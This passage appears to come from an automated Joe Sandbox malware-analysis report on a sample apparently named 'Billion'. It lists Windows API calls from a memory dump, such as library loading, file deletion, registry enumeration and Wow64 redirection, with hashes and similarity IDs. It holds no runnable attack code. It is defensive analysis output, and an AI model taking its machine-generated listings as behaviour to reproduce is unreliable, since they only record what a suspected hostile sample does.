                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000189,?,00000000), ref: 001927F6
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00138577: _wcslen.LIBCMT ref: 0013858A
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageSend$_wcslen$ClassName
                                                                                                                                                                                                                                                                                                          • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                                          • API String ID: 2081771294-1403004172
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 001C3A29
                                                                                                                                                                                                                                                                                                          • LoadLibraryW.KERNEL32(?), ref: 001C3A30
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 001C3A45
                                                                                                                                                                                                                                                                                                          • DestroyWindow.USER32(?), ref: 001C3A4D
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                                                                                                                                                                                                                                                          • String ID: SysAnimate32
                                                                                                                                                                                                                                                                                                          • API String ID: 3529120543-1011021900
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0013249F: GetWindowLongW.USER32(00000000,000000EB), ref: 001324B0
                                                                                                                                                                                                                                                                                                          • GetCursorPos.USER32(?), ref: 001C9A5D
                                                                                                                                                                                                                                                                                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 001C9A72
                                                                                                                                                                                                                                                                                                          • GetCursorPos.USER32(?), ref: 001C9ABA
                                                                                                                                                                                                                                                                                                          • DefDlgProcW.USER32(?,0000007B,?,?,?,?), ref: 001C9AF0
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                                                                                                                                                                                                          • String ID: (
                                                                                                                                                                                                                                                                                                          • API String ID: 2864067406-2181176062
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0013249F: GetWindowLongW.USER32(00000000,000000EB), ref: 001324B0
                                                                                                                                                                                                                                                                                                          • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00131AF4
                                                                                                                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 001731F9
                                                                                                                                                                                                                                                                                                          • GetCursorPos.USER32(?), ref: 00173203
                                                                                                                                                                                                                                                                                                          • ScreenToClient.USER32(?,?), ref: 0017320E
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
• Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                                                                                                                                                                                                                          • String ID: (
                                                                                                                                                                                                                                                                                                          • API String ID: 4127811313-2181176062
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0015508E,?,?,0015502E,?,001F98D8,0000000C,00155185,?,00000002), ref: 001550FD
                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00155110
                                                                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,0015508E,?,?,0015502E,?,001F98D8,0000000C,00155185,?,00000002,00000000), ref: 00155133
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
• Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                                                                          • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32 ref: 0018E785
                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0018E797
                                                                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 0018E7BD
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
• Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                                                          • String ID: GetSystemWow64DirectoryW$X64
                                                                                                                                                                                                                                                                                                          • API String ID: 145871493-2590602151
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,?,0013668B,?,?,001362FA,?,00000001,?,?,00000000), ref: 0013664A
                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0013665C
                                                                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,0013668B,?,?,001362FA,?,00000001,?,?,00000000), ref: 0013666E
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
• Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                                                          • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                                                                                                                                                                                                          • API String ID: 145871493-3689287502
                                                                                                                                                                                                                                                                                                          • Opcode ID: 67f34d80477ff270dcce71c10f0fd2cf597d52b97a02b930fac382be0e86b389
                                                                                                                                                                                                                                                                                                          • Instruction ID: 4f5d16e15d52d00feb199623ec447a041a49afbbaebffac8d8727d01605aa576
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 67f34d80477ff270dcce71c10f0fd2cf597d52b97a02b930fac382be0e86b389
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 22E0CD3560152227D2112725BC0EF6FA9689F92F62F094139FD04D2150DF54CC4180F5
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00175657,?,?,001362FA,?,00000001,?,?,00000000), ref: 00136610
                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00136622
                                                                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,00175657,?,?,001362FA,?,00000001,?,?,00000000), ref: 00136635
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                                                          • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                                                                                                                                                                                                          • API String ID: 145871493-1355242751
                                                                                                                                                                                                                                                                                                          • Opcode ID: 14231ee693de94dde6131956cc3c0047d48c593cbbe0e9b99445d5fe9197e0f2
                                                                                                                                                                                                                                                                                                          • Instruction ID: 578c7da05548741f988f4f957fb3d0da43caeac0f2eb1c46496896c39fd84527
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 14231ee693de94dde6131956cc3c0047d48c593cbbe0e9b99445d5fe9197e0f2
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 87D05B7561293177C23227257C1AE9F6F249FD1F513194039F904A2134CF60CD41C5D9
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 001A35C4
                                                                                                                                                                                                                                                                                                          • DeleteFileW.KERNEL32(?), ref: 001A3646
                                                                                                                                                                                                                                                                                                          • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 001A365C
                                                                                                                                                                                                                                                                                                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 001A366D
                                                                                                                                                                                                                                                                                                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 001A367F
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: File$Delete$Copy
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3226157194-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 36a0f47adf65a686323b9ab4be6008e95d9973d6d17c04f95502cea9f002b811
                                                                                                                                                                                                                                                                                                          • Instruction ID: 86ca3af4e143eaaf05df818d79be705d04543babe40864366de423c178fc70a9
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 36a0f47adf65a686323b9ab4be6008e95d9973d6d17c04f95502cea9f002b811
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 46B17D76E00219ABDF15DBA4CC85FDEBBBDEF19314F0040AAF519E6141EB349B448B61
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 001BAE87
                                                                                                                                                                                                                                                                                                          • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 001BAE95
                                                                                                                                                                                                                                                                                                          • GetProcessIoCounters.KERNEL32(00000000,?), ref: 001BAEC8
                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 001BB09D
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3488606520-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 4c21ad464367c8d1b70d523ec03240b0a07b114a36fb25b94eb5a34e9310fd07
                                                                                                                                                                                                                                                                                                          • Instruction ID: 267e8ba3fac03c47c0199142899c5f76b4e5a211f857712738599426cdd954ea
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4c21ad464367c8d1b70d523ec03240b0a07b114a36fb25b94eb5a34e9310fd07
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3FA1B0B1A04301AFE720EF24C886F2AB7E5AF54710F54885DF5999B6D2DBB1EC40CB81
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0013B329: _wcslen.LIBCMT ref: 0013B333
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001BD3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,001BC10E,?,?), ref: 001BD415
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001BD3F8: _wcslen.LIBCMT ref: 001BD451
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001BD3F8: _wcslen.LIBCMT ref: 001BD4C8
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001BD3F8: _wcslen.LIBCMT ref: 001BD4FE
                                                                                                                                                                                                                                                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 001BC505
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 001BC560
• RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 001BC5C3
• RegCloseKey.ADVAPI32(?,?), ref: 001BC606
• RegCloseKey.ADVAPI32(00000000), ref: 001BC613
Memory Dump Source
• Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
• Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_130000_Billion.jbxd
Similarity
• API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
• String ID:
• API String ID: 826366716-0
APIs
  • Part of subcall function 0019E6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0019D7CD,?), ref: 0019E714
  • Part of subcall function 0019E6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0019D7CD,?), ref: 0019E72D
  • Part of subcall function 0019EAB0: GetFileAttributesW.KERNEL32(?,0019D840), ref: 0019EAB1
• lstrcmpiW.KERNEL32(?,?), ref: 0019ED8A
• MoveFileW.KERNEL32(?,?), ref: 0019EDC3
• _wcslen.LIBCMT ref: 0019EF02
• _wcslen.LIBCMT ref: 0019EF1A
• SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 0019EF67
Memory Dump Source
• Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
• Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_130000_Billion.jbxd
Similarity
• API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
• String ID:
• API String ID: 3183298772-0
APIs
• VariantInit.OLEAUT32(?), ref: 00199534
• VariantClear.OLEAUT32 ref: 001995A5
• VariantClear.OLEAUT32 ref: 00199604
• VariantClear.OLEAUT32(?), ref: 00199677
• VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 001996A2
Memory Dump Source
• Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
• Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_130000_Billion.jbxd
Similarity
• API ID: Variant$Clear$ChangeInitType
• String ID:
• API String ID: 4136290138-0
APIs
• GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 001A95F3
• GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 001A961F
• WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 001A9677
• WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 001A969C
• WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 001A96A4
Memory Dump Source
• Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
• Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_130000_Billion.jbxd
Similarity
• API ID: PrivateProfile$SectionWrite$String
• String ID:
• API String ID: 2832842796-0
APIs
• LoadLibraryW.KERNEL32(?,00000000,?), ref: 001B999D
• GetProcAddress.KERNEL32(00000000,?), ref: 001B9A2D
• GetProcAddress.KERNEL32(00000000,00000000), ref: 001B9A49
• GetProcAddress.KERNEL32(00000000,?), ref: 001B9A8F
• FreeLibrary.KERNEL32(00000000), ref: 001B9AAF
  • Part of subcall function 0014F9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,001A1A02,?,7644E610), ref: 0014F9F1
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0014F9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00190354,00000000,00000000,?,?,001A1A02,?,7644E610,?,00190354), ref: 0014FA18
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 666041331-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • SetWindowLongW.USER32(00000002,000000F0,?), ref: 001C766B
                                                                                                                                                                                                                                                                                                          • SetWindowLongW.USER32(?,000000EC,?), ref: 001C7682
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 001C76AB
                                                                                                                                                                                                                                                                                                          • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,001AB5BE,00000000,00000000), ref: 001C76D0
                                                                                                                                                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 001C76FF
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
